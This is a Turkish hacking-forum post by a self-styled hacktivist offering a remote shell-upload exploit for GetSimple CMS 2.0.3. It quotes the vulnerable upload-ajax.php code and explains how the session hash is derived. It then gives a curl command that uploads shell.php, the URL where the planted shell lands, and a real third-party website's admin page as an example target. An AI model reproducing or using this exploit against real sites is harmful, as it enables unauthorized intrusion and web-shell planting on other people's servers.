Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,363 / 1,363
Deneyim: 54 / 100
Rep Sayısı: 2722
Mesaj Sayısı: 6201
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day
30.09.2014 13:05
Kod:
Website Yazarı => http://reflective.noblogs.org (OWL?)
Türkçe Anlatım => KingSkrupellos - Cyberizm.Org
Yazılım Linki => http://get-simple.info/
Açıktan etkilenen versiyon => 2.0.3
Bug Code:
getsimple/admin/upload-ajax.php

if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$name = clean_img_name($_FILES['Filedata']['name']);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(&lsquo;//&rsquo;,'/&rsquo;,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);

Generating SESSIONHASH: md5( $salt. $sitename)


[XPL]
curl -F &ldquo;[email protected];filename=shell.php&rdquo; http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO

SHELL Adresiniz =>
http://getsimple_localhost/data/uploads/shell.php

Örnek Site => http://www.runningillustrated.com/admin/

İngilizce Kaynak => http://www.bugsearch.net/en/11428/getsimple-cms-203-remote-upload-shell-upload-ajaxphp-0day.html
(Bu konu en son: 30.09.2014 Tarihinde, Saat: 13:12 düzenlenmiştir. Düzenleyen: KingSkrupellos.)
Alinti



1 Ziyaretçi